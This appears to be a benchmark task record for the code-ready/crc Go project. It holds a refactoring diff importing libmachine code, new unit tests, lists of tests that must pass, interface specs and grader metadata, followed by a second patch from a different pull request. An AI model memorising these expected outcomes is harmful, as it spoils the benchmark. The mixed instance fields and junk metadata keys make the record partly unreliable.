"github.com/code-ready/machine/libmachine" "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/host" "github.com/code-ready/machine/libmachine/state" "github.com/docker/go-units" "github.com/pkg/errors" diff --git a/vendor/github.com/code-ready/machine/drivers/hyperv/hyperv.go b/pkg/drivers/hyperv/hyperv.go similarity index 98% rename from vendor/github.com/code-ready/machine/drivers/hyperv/hyperv.go rename to pkg/drivers/hyperv/hyperv.go index f521544ac..3c054d24a 100644 --- a/vendor/github.com/code-ready/machine/drivers/hyperv/hyperv.go +++ b/pkg/drivers/hyperv/hyperv.go @@ -6,9 +6,9 @@ import ( "fmt" "time" + log "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/libmachine/mcnutils" "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/log" - "github.com/code-ready/machine/libmachine/mcnutils" "github.com/code-ready/machine/libmachine/state" ) diff --git a/vendor/github.com/code-ready/machine/drivers/hyperv/powershell.go b/pkg/drivers/hyperv/powershell.go similarity index 98% rename from vendor/github.com/code-ready/machine/drivers/hyperv/powershell.go rename to pkg/drivers/hyperv/powershell.go index ba1b81c1e..dbfa652ea 100644 --- a/vendor/github.com/code-ready/machine/drivers/hyperv/powershell.go +++ b/pkg/drivers/hyperv/powershell.go @@ -9,7 +9,7 @@ import ( "fmt" - "github.com/code-ready/machine/libmachine/log" + log "github.com/code-ready/crc/pkg/crc/logging" ) var powershell string diff --git a/vendor/github.com/code-ready/machine/drivers/none/driver.go b/pkg/drivers/none/driver.go similarity index 100% rename from vendor/github.com/code-ready/machine/drivers/none/driver.go rename to pkg/drivers/none/driver.go diff --git a/vendor/github.com/code-ready/machine/libmachine/host/host.go b/pkg/libmachine/host/host.go similarity index 92% rename from vendor/github.com/code-ready/machine/libmachine/host/host.go rename to pkg/libmachine/host/host.go index 7dccbbc09..f257ca694 100644 --- a/vendor/github.com/code-ready/machine/libmachine/host/host.go +++ b/pkg/libmachine/host/host.go @@ -5,10 +5,10 @@ import ( "net/rpc" "regexp" + log "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/libmachine/mcnerror" + "github.com/code-ready/crc/pkg/libmachine/mcnutils" "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/log" - "github.com/code-ready/machine/libmachine/mcnerror" - "github.com/code-ready/machine/libmachine/mcnutils" "github.com/code-ready/machine/libmachine/state" ) diff --git a/vendor/github.com/code-ready/machine/libmachine/host/migrate.go b/pkg/libmachine/host/migrate.go similarity index 91% rename from vendor/github.com/code-ready/machine/libmachine/host/migrate.go rename to pkg/libmachine/host/migrate.go index f63bb4a3f..e5d3a7dc6 100644 --- a/vendor/github.com/code-ready/machine/libmachine/host/migrate.go +++ b/pkg/libmachine/host/migrate.go @@ -5,8 +5,8 @@ import ( "errors" "fmt" - "github.com/code-ready/machine/drivers/none" - "github.com/code-ready/machine/libmachine/version" + "github.com/code-ready/crc/pkg/drivers/none" + "github.com/code-ready/crc/pkg/libmachine/version" ) var ( diff --git a/vendor/github.com/code-ready/machine/libmachine/libmachine.go b/pkg/libmachine/libmachine.go similarity index 90% rename from vendor/github.com/code-ready/machine/libmachine/libmachine.go rename to pkg/libmachine/libmachine.go index 1e122a56e..8a7109a1f 100644 --- a/vendor/github.com/code-ready/machine/libmachine/libmachine.go +++ b/pkg/libmachine/libmachine.go @@ -5,16 +5,16 @@ import ( "fmt" "io" - "github.com/code-ready/machine/drivers/hyperv" + log "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/drivers/hyperv" + "github.com/code-ready/crc/pkg/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/mcnerror" + "github.com/code-ready/crc/pkg/libmachine/mcnutils" + "github.com/code-ready/crc/pkg/libmachine/persist" + "github.com/code-ready/crc/pkg/libmachine/version" "github.com/code-ready/machine/libmachine/drivers" rpcdriver "github.com/code-ready/machine/libmachine/drivers/rpc" - "github.com/code-ready/machine/libmachine/host" - "github.com/code-ready/machine/libmachine/log" - "github.com/code-ready/machine/libmachine/mcnerror" - "github.com/code-ready/machine/libmachine/mcnutils" - "github.com/code-ready/machine/libmachine/persist" "github.com/code-ready/machine/libmachine/state" - "github.com/code-ready/machine/libmachine/version" ) type API interface { diff --git a/vendor/github.com/code-ready/machine/libmachine/persist/filestore.go b/pkg/libmachine/persist/filestore.go similarity index 94% rename from vendor/github.com/code-ready/machine/libmachine/persist/filestore.go rename to pkg/libmachine/persist/filestore.go index ef43f9f45..2ee5e0b6b 100644 --- a/vendor/github.com/code-ready/machine/libmachine/persist/filestore.go +++ b/pkg/libmachine/persist/filestore.go @@ -7,9 +7,9 @@ import ( "os" "path/filepath" - "github.com/code-ready/machine/libmachine/host" - "github.com/code-ready/machine/libmachine/log" - "github.com/code-ready/machine/libmachine/mcnerror" + log "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/mcnerror" ) type Filestore struct { diff --git a/vendor/github.com/code-ready/machine/libmachine/persist/store.go b/pkg/libmachine/persist/store.go similarity index 87% rename from vendor/github.com/code-ready/machine/libmachine/persist/store.go rename to pkg/libmachine/persist/store.go index fcda4656f..4bee232e4 100644 --- a/vendor/github.com/code-ready/machine/libmachine/persist/store.go +++ b/pkg/libmachine/persist/store.go @@ -1,7 +1,7 @@ package persist import ( - "github.com/code-ready/machine/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/host" ) type Store interface { diff --git a/pkg/libmachine/version/version.go b/pkg/libmachine/version/version.go new file mode 100644 index 000000000..3cacffdb0 --- /dev/null +++ b/pkg/libmachine/version/version.go @@ -0,0 +1,11 @@ +package version + +var ( + // APIVersion dictates which version of the libmachine API this is. + APIVersion = 1 + + // ConfigVersion dictates which version of the config.json format is + // used. It needs to be bumped if there is a breaking change, and + // therefore migration, introduced to the config file format. + ConfigVersion = 3 +) diff --git a/vendor/modules.txt b/vendor/modules.txt index 26119e3f7..a6e259a90 100644 --- a/vendor/modules.txt +++ b/vendor/modules.txt @@ -43,18 +43,11 @@ github.com/code-ready/gvisor-tap-vsock/pkg/virtualnetwork # github.com/code-ready/machine v0.0.0-20201202090222-9558ae8c05b9 ## explicit github.com/code-ready/machine/drivers/hyperkit -github.com/code-ready/machine/drivers/hyperv github.com/code-ready/machine/drivers/libvirt -github.com/code-ready/machine/drivers/none -github.com/code-ready/machine/libmachine github.com/code-ready/machine/libmachine/drivers github.com/code-ready/machine/libmachine/drivers/plugin/localbinary github.com/code-ready/machine/libmachine/drivers/rpc -github.com/code-ready/machine/libmachine/host github.com/code-ready/machine/libmachine/log -github.com/code-ready/machine/libmachine/mcnerror -github.com/code-ready/machine/libmachine/mcnutils -github.com/code-ready/machine/libmachine/persist github.com/code-ready/machine/libmachine/state github.com/code-ready/machine/libmachine/version # github.com/cucumber/gherkin-go/v11 v11.0.0
Import 90% of machine code in crc Only drivers (rpc, driver interface, hyperkit and libvirt structs) and state are left in code-ready/machine. It will be easier to refactor machine code: better tests in the future, etc. All the persistence is now done in crc side. code-ready/machine is stateless and also all drivers. will enable https://github.com/code-ready/machine/pull/54
**Title** Refactor machine component imports and improve test setup **Problem** The CRC codebase now contains the former machine implementation, but many source files still import the old vendored machine packages, causing compilation failures. The test command also omitted the race detector, and the CI environment lacked a required tool for building on Windows. **Root Cause** Residual import paths and build script settings were left unchanged after the migration of machine code into the CRC repository. **Fix / Expected Behavior** - Update all references to point to the new internal machine, driver, and libmachine packages. - Introduce a centralized version definition for the libmachine API and configuration format. - Switch the standard test command to run with the Go race detector. - Add the missing Windows tool installation step to the CI configuration. - Ensure logging and utility imports use the CRC logging package consistently. **Risk & Validation** - Risk of breaking external consumers that might still rely on the previous vendored paths; mitigated by running the full test suite. - Verify that the project builds on all supported platforms and that `go test -race ./...` completes without failures. - Confirm CI pipelines pass after the added tool installation and updated test command.
1,802
code-ready/crc
diff --git a/pkg/libmachine/host/host_test.go b/pkg/libmachine/host/host_test.go new file mode 100644 index 000000000..9b724352f --- /dev/null +++ b/pkg/libmachine/host/host_test.go @@ -0,0 +1,37 @@ +package host + +import ( + "testing" + + _ "github.com/code-ready/crc/pkg/drivers/none" +) + +func TestValidateHostnameValid(t *testing.T) { + hosts := []string{ + "zomg", + "test-ing", + "some.h0st", + } + + for _, v := range hosts { + isValid := ValidateHostName(v) + if !isValid { + t.Fatalf("Thought a valid hostname was invalid: %s", v) + } + } +} + +func TestValidateHostnameInvalid(t *testing.T) { + hosts := []string{ + "zom_g", + "test$ing", + "some😄host", + } + + for _, v := range hosts { + isValid := ValidateHostName(v) + if isValid { + t.Fatalf("Thought an invalid hostname was valid: %s", v) + } + } +} diff --git a/pkg/libmachine/host/migrate_test.go b/pkg/libmachine/host/migrate_test.go new file mode 100644 index 000000000..6d1f9b3f3 --- /dev/null +++ b/pkg/libmachine/host/migrate_test.go @@ -0,0 +1,44 @@ +package host + +import ( + "testing" + + "github.com/code-ready/crc/pkg/drivers/none" + "github.com/stretchr/testify/assert" +) + +func TestLoadUnsupportedConfiguration(t *testing.T) { + _, err := MigrateHost("default", []byte(`{"ConfigVersion": 4}`)) + assert.Equal(t, err, errUnexpectedConfigVersion) +} + +func TestLoadHost(t *testing.T) { + driverJSON := `{ + "IPAddress": "192.168.130.11", + "MachineName": "crc", + "BundleName": "crc_libvirt_4.6.6.crcbundle", + "Memory": 9216, + "CPU": 4 + }` + + host, err := MigrateHost("default", []byte(`{ + "ConfigVersion": 3, + "Driver": `+driverJSON+`, + "DriverName": "libvirt", + "DriverPath": "/home/john/.crc/bin", + "Name": "crc" +}`)) + + assert.NoError(t, err) + assert.Equal(t, &Host{ + ConfigVersion: 3, + Name: "crc", + DriverName: "libvirt", + DriverPath: "/home/john/.crc/bin", + RawDriver: []byte(driverJSON), + Driver: &RawDataDriver{ + Data: []byte(driverJSON), + Driver: none.NewDriver("default", ""), + }, + }, host) +} diff --git a/pkg/libmachine/hosttest/default_test_host.go b/pkg/libmachine/hosttest/default_test_host.go new file mode 100644 index 000000000..1bd92d365 --- /dev/null +++ b/pkg/libmachine/hosttest/default_test_host.go @@ -0,0 +1,22 @@ +package hosttest + +import ( + "github.com/code-ready/crc/pkg/drivers/none" + "github.com/code-ready/crc/pkg/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/version" +) + +const ( + DefaultHostName = "test-host" +) + +func GetDefaultTestHost() (*host.Host, error) { + driver := none.NewDriver(DefaultHostName, "/tmp/artifacts") + + return &host.Host{ + ConfigVersion: version.ConfigVersion, + Name: DefaultHostName, + Driver: driver, + DriverName: "none", + }, nil +} diff --git a/vendor/github.com/code-ready/machine/libmachine/mcnerror/errors.go b/pkg/libmachine/mcnerror/errors.go similarity index 100% rename from vendor/github.com/code-ready/machine/libmachine/mcnerror/errors.go rename to pkg/libmachine/mcnerror/errors.go diff --git a/vendor/github.com/code-ready/machine/libmachine/mcnutils/utils.go b/pkg/libmachine/mcnutils/utils.go similarity index 100% rename from vendor/github.com/code-ready/machine/libmachine/mcnutils/utils.go rename to pkg/libmachine/mcnutils/utils.go diff --git a/pkg/libmachine/mcnutils/utils_test.go b/pkg/libmachine/mcnutils/utils_test.go new file mode 100644 index 000000000..e447b41db --- /dev/null +++ b/pkg/libmachine/mcnutils/utils_test.go @@ -0,0 +1,85 @@ +package mcnutils + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestCopyFile(t *testing.T) { + testStr := "test-machine" + + srcFile, err := ioutil.TempFile("", "machine-test-") + if err != nil { + t.Fatal(err) + } + srcFi, err := srcFile.Stat() + if err != nil { + t.Fatal(err) + } + + _, _ = srcFile.Write([]byte(testStr)) + srcFile.Close() + + srcFilePath := filepath.Join(os.TempDir(), srcFi.Name()) + + destFile, err := ioutil.TempFile("", "machine-copy-test-") + if err != nil { + t.Fatal(err) + } + + destFi, err := destFile.Stat() + if err != nil { + t.Fatal(err) + } + + destFile.Close() + + destFilePath := filepath.Join(os.TempDir(), destFi.Name()) + + if err := CopyFile(srcFilePath, destFilePath); err != nil { + t.Fatal(err) + } + + data, err := ioutil.ReadFile(destFilePath) + if err != nil { + t.Fatal(err) + } + + if string(data) != testStr { + t.Fatalf("expected data \"%s\"; received \"%s\"", testStr, string(data)) + } +} + +func TestGenerateRandomID(t *testing.T) { + id := GenerateRandomID() + + if len(id) != 64 { + t.Fatalf("Id returned is incorrect: %s", id) + } +} + +func TestShortenId(t *testing.T) { + id := GenerateRandomID() + truncID := TruncateID(id) + if len(truncID) != 12 { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenIdEmpty(t *testing.T) { + id := "" + truncID := TruncateID(id) + if len(truncID) > len(id) { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenIdInvalid(t *testing.T) { + id := "1234" + truncID := TruncateID(id) + if len(truncID) != len(id) { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} diff --git a/pkg/libmachine/persist/filestore_test.go b/pkg/libmachine/persist/filestore_test.go new file mode 100644 index 000000000..bd8a62d7d --- /dev/null +++ b/pkg/libmachine/persist/filestore_test.go @@ -0,0 +1,205 @@ +package persist + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "regexp" + "testing" + + "github.com/code-ready/crc/pkg/drivers/none" + "github.com/code-ready/crc/pkg/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/hosttest" +) + +func cleanup() { + os.RemoveAll(os.Getenv("MACHINE_STORAGE_PATH")) +} + +func getTestStore() Filestore { + tmpDir, err := ioutil.TempDir("", "machine-test-") + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + return Filestore{ + Path: tmpDir, + } +} + +func TestStoreSave(t *testing.T) { + defer cleanup() + + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + path := filepath.Join(store.GetMachinesDir(), h.Name) + if _, err := os.Stat(path); os.IsNotExist(err) { + t.Fatalf("Host path doesn't exist: %s", path) + } + + files, _ := ioutil.ReadDir(path) + for _, f := range files { + r := regexp.MustCompile("config.json.tmp*") + if r.MatchString(f.Name()) { + t.Fatalf("Failed to remove temp filestore:%s", f.Name()) + } + } +} + +func TestStoreSaveOmitRawDriver(t *testing.T) { + defer cleanup() + + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + configJSONPath := filepath.Join(store.GetMachinesDir(), h.Name, "config.json") + + f, err := os.Open(configJSONPath) + if err != nil { + t.Fatal(err) + } + + configData, err := ioutil.ReadAll(f) + if err != nil { + t.Fatal(err) + } + + fakeHost := make(map[string]interface{}) + + if err := json.Unmarshal(configData, &fakeHost); err != nil { + t.Fatal(err) + } + + if rawDriver, ok := fakeHost["RawDriver"]; ok { + t.Fatal("Should not have gotten a value for RawDriver reading host from disk but got one: ", rawDriver) + } + +} + +func TestStoreRemove(t *testing.T) { + defer cleanup() + + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + path := filepath.Join(store.GetMachinesDir(), h.Name) + if _, err := os.Stat(path); os.IsNotExist(err) { + t.Fatalf("Host path doesn't exist: %s", path) + } + + err = store.Remove(h.Name) + if err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(path); err == nil { + t.Fatalf("Host path still exists after remove: %s", path) + } +} + +func TestStoreExists(t *testing.T) { + defer cleanup() + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + exists, err := store.Exists(h.Name) + if err != nil { + t.Fatal(err) + } + if exists { + t.Fatal("Host should not exist before saving") + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + if err := store.SetExists(h.Name); err != nil { + t.Fatal(err) + } + + exists, err = store.Exists(h.Name) + if err != nil { + t.Fatal(err) + } + + if !exists { + t.Fatal("Host should exist after saving") + } + + if err := store.Remove(h.Name); err != nil { + t.Fatal(err) + } + + exists, err = store.Exists(h.Name) + if err != nil { + t.Fatal(err) + } + + if exists { + t.Fatal("Host should not exist after removing") + } +} + +func TestStoreLoad(t *testing.T) { + defer cleanup() + + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + h, err = store.Load(h.Name) + if err != nil { + t.Fatal(err) + } + + rawDataDriver, ok := h.Driver.(*host.RawDataDriver) + if !ok { + t.Fatal("Expected driver loaded from store to be of type *host.RawDataDriver and it was not") + } + + realDriver := none.NewDriver(h.Name, store.Path) + + if err := json.Unmarshal(rawDataDriver.Data, &realDriver); err != nil { + t.Fatalf("Error unmarshaling rawDataDriver data into concrete 'none' driver: %s", err) + } +}
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestClientUploadWithConsent", "TestClientUploadWithOutConsent", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestValidateHostnameValid", "TestValidateHostnameInvalid", "TestLoadUnsupportedConfiguration", "TestLoadHost", "TestCopyFile", "TestGenerateRandomID", "TestShortenId", "TestShortenIdEmpty", "TestShortenIdInvalid", "TestStoreSave", "TestStoreSaveOmitRawDriver", "TestStoreRemove", "TestStoreExists", "TestStoreLoad", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
[]
Method: Filestore.SetExists(hostName string) error Location: pkg/libmachine/persist/filestore.go Inputs: - **hostName** (string): the name of the machine whose existence flag should be recorded in the filestore. Outputs: - **error**: nil on success, or a non‑nil error if the flag cannot be written (e.g., I/O failure, permission issue). Description: Persists a marker that a host with the given name is now present in the filestore. This method is used after a successful `Save` to make the store report the host as existing when `Exists` is called. Method: Filestore.Exists(hostName string) (bool, error) Location: pkg/libmachine/persist/store.go (via Store interface implementation) Inputs: - **hostName** (string): the name of the machine to check. Outputs: - **bool**: true if the host’s directory and marker file are present, false otherwise. - **error**: non‑nil if the check could not be performed (e.g., I/O error). Description: Returns whether a host with the given name is recorded in the filestore. Used in tests to verify presence before and after `Save`/`Remove`. Function: ValidateHostName(name string) bool Location: pkg/libmachine/host/host.go Inputs: - **name** (string): hostname to validate. Outputs: - **bool**: true if the hostname complies with allowed patterns (alphanumeric, dashes, dots, no special characters); false otherwise. Description: Checks that a hostname is syntactically valid. Tests call it with valid and invalid examples. Function: MigrateHost(name string, data []byte) (*Host, error) Location: pkg/libmachine/host/migrate.go Inputs: - **name** (string): name to assign to the host being loaded. - **data** ( []byte ): JSON representation of the persisted host configuration. Outputs: - **\*Host**: populated Host struct when migration succeeds. - **error**: `errUnexpectedConfigVersion` if the `ConfigVersion` in the JSON is not supported, otherwise any unmarshalling or driver‑creation error. Description: Loads a host configuration from legacy JSON, performing version checks and driver reconstruction. Tests verify error handling for unsupported config versions and successful loading. Function: CopyFile(srcPath string, dstPath string) error Location: pkg/libmachine/mcnutils/utils.go Inputs: - **srcPath** (string): path to the source file. - **dstPath** (string): path where the file should be copied. Outputs: - **error**: nil on success; otherwise an I/O error. Description: Copies the contents of one file to another, preserving permissions. Used in utils tests. Function: GenerateRandomID() string Location: pkg/libmachine/mcnutils/utils.go Inputs: none Outputs: - **string**: a 64‑character hexadecimal random identifier. Description: Produces a random machine identifier; tests assert its length. Function: TruncateID(id string) string Location: pkg/libmachine/mcnutils/utils.go Inputs: - **id** (string): identifier to shorten. Outputs: - **string**: first 12 characters of a valid 64‑char ID, or the original string if it is empty or shorter than 12 characters. Description: Shortens a full identifier for display; tests cover normal, empty, and short inputs.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 18, "num_modified_lines": 47, "pr_author": "guillaumerose", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://github.com/code-ready/machine/pull/54" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests importing most of the machine code into the crc repository and updating imports, essentially a large refactor. The supplied test patch defines the expected behavior by exercising host validation, migration, persistence, and utility functions, which aligns with the refactor goal. The problem statement does not contain ambiguous requirements beyond the test expectations, and the tests cover the needed functionality, so the task is solvable (A). No misalignments with the tests are observed.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
7b098c1bcaad0422dad36a390f8b335a9554548e
2021-01-05 10:11:01
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1815#" title="Author self-approved">praveenkumar</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [praveenkumar] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> guillaumerose: Good! Should we also change the returned struct and remove the boolean KubeletStarted ? gbraad: > remove KubeletStarted most likely cfergeau: > > remove KubeletStarted > > most likely Wouldn't this be useful when podman support comes back?
code-ready__crc-1815
diff --git a/cmd/crc/cmd/config/config.go b/cmd/crc/cmd/config/config.go index 6a191653b..4aa2e4cdb 100644 --- a/cmd/crc/cmd/config/config.go +++ b/cmd/crc/cmd/config/config.go @@ -52,22 +52,15 @@ func RegisterSettings(cfg *config.Config) { } func isPreflightKey(key string) bool { - return strings.HasPrefix(key, "skip-") || strings.HasPrefix(key, "warn-") + return strings.HasPrefix(key, "skip-") } // less is used to sort the config keys. We want to sort first the regular keys, and -// then the keys related to preflight starting with a skip- or warn- prefix. We want -// these preflight keys to be grouped by pair: 'skip-bar', 'warn-bar', 'skip-foo', 'warn-foo' -// would be sorted in that order. +// then the keys related to preflight starting with a skip- prefix. func less(lhsKey, rhsKey string) bool { if isPreflightKey(lhsKey) { if isPreflightKey(rhsKey) { - // lhs is preflight, rhs is preflight - if lhsKey[4:] == rhsKey[4:] { - // we want skip-foo before warn-foo - return lhsKey < rhsKey - } - // ignore skip-/warn- prefix + // ignore skip prefix return lhsKey[4:] < rhsKey[4:] } // lhs is preflight, rhs is not preflight diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index deac2af5f..1c2b96adf 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -5,6 +5,7 @@ import ( "io/ioutil" "os" "strings" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -174,13 +175,13 @@ func addForceFlag(cmd *cobra.Command) { func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { return func(cmd *cobra.Command, args []string) error { - if err := input(cmd, args); err != nil { - if serr := segmentClient.Upload(fullCmd, err); serr != nil { - fmt.Println(serr.Error()) - } - return err + logging.Debugf("Running '%s'", fullCmd) + startTime := time.Now() + err := input(cmd, args) + if serr := segmentClient.Upload(fullCmd, time.Since(startTime), err); serr != nil { + logging.Debugf("Cannot send data to telemetry: %v", serr) } - return nil + return err } } diff --git a/docs/source/topics/con_about-codeready-containers-configuration.adoc b/docs/source/topics/con_about-codeready-containers-configuration.adoc index 160bc0043..8c858f24c 100644 --- a/docs/source/topics/con_about-codeready-containers-configuration.adoc +++ b/docs/source/topics/con_about-codeready-containers-configuration.adoc @@ -9,4 +9,4 @@ Run the [command]`{bin} config --help` command to list the available properties. You can also use the [command]`{bin} config` command to configure the behavior of the startup checks for the [command]`{bin} start` and [command]`{bin} setup` commands. By default, startup checks report an error and stop execution when their conditions are not met. -Set the value of a property starting with `skip-check` or `warn-check` to `true` to skip the check or report a warning rather than an error, respectively. +Set the value of a property starting with `skip-check` to `true` to skip the check. diff --git a/pkg/crc/machine/start.go b/pkg/crc/machine/start.go index ad4b6b641..545c51c18 100644 --- a/pkg/crc/machine/start.go +++ b/pkg/crc/machine/start.go @@ -23,7 +23,6 @@ import ( "github.com/code-ready/crc/pkg/crc/ssh" crcssh "github.com/code-ready/crc/pkg/crc/ssh" "github.com/code-ready/crc/pkg/crc/systemd" - "github.com/code-ready/crc/pkg/crc/systemd/states" crcos "github.com/code-ready/crc/pkg/os" "github.com/code-ready/machine/libmachine" "github.com/code-ready/machine/libmachine/drivers" @@ -350,12 +349,6 @@ func (client *client) Start(startConfig StartConfig) (*StartResult, error) { } } - // Check if kubelet service is running inside the VM - kubeletStatus, err := sd.Status("kubelet") - if err != nil || kubeletStatus != states.Running { - return nil, errors.Wrap(err, "kubelet service is not running") - } - // In Openshift 4.3, when cluster comes up, the following happens // 1. After the openshift-apiserver pod is started, its log contains multiple occurrences of `certificate has expired or is not yet valid` // 2. Initially there is no request-header's client-ca crt available to `extension-apiserver-authentication` configmap diff --git a/pkg/crc/preflight/preflight.go b/pkg/crc/preflight/preflight.go index 7652758ab..ada6d0e19 100644 --- a/pkg/crc/preflight/preflight.go +++ b/pkg/crc/preflight/preflight.go @@ -50,20 +50,6 @@ func (check *Check) shouldSkip(config config.Storage) bool { return config.Get(check.getSkipConfigName()).AsBool() } -func (check *Check) getWarnConfigName() string { - if check.configKeySuffix == "" { - return "" - } - return "warn-" + check.configKeySuffix -} - -func (check *Check) shouldWarn(config config.Storage) bool { - if check.configKeySuffix == "" { - return false - } - return config.Get(check.getWarnConfigName()).AsBool() -} - func (check *Check) doCheck(config config.Storage) error { if check.checkDescription == "" { panic(fmt.Sprintf("Should not happen, empty description for check '%s'", check.configKeySuffix)) @@ -110,13 +96,8 @@ func doPreflightChecks(config config.Storage, checks []Check) error { if check.flags&SetupOnly == SetupOnly || check.flags&CleanUpOnly == CleanUpOnly { continue } - err := check.doCheck(config) - if err != nil { - if check.shouldWarn(config) { - logging.Warn(err.Error()) - } else { - return err - } + if err := check.doCheck(config); err != nil { + return err } } return nil @@ -131,13 +112,8 @@ func doFixPreflightChecks(config config.Storage, checks []Check) error { if err == nil { continue } - err = check.doFix() - if err != nil { - if check.shouldWarn(config) { - logging.Warn(err.Error()) - } else { - return err - } + if err = check.doFix(); err != nil { + return err } } return nil @@ -169,7 +145,6 @@ func doRegisterSettings(cfg config.Schema, checks []Check) { for _, check := range checks { if check.configKeySuffix != "" { cfg.AddSetting(check.getSkipConfigName(), false, config.ValidateBool, config.SuccessfullyApplied) - cfg.AddSetting(check.getWarnConfigName(), false, config.ValidateBool, config.SuccessfullyApplied) } } } diff --git a/pkg/crc/preflight/preflight_checks_linux.go b/pkg/crc/preflight/preflight_checks_linux.go index eda0353fb..41b03a9a3 100644 --- a/pkg/crc/preflight/preflight_checks_linux.go +++ b/pkg/crc/preflight/preflight_checks_linux.go @@ -144,10 +144,10 @@ func fixLibvirtInstalled(distro *linux.OsRelease) func() error { func installLibvirtCommand(distro *linux.OsRelease) string { yumCommand := "yum install -y libvirt 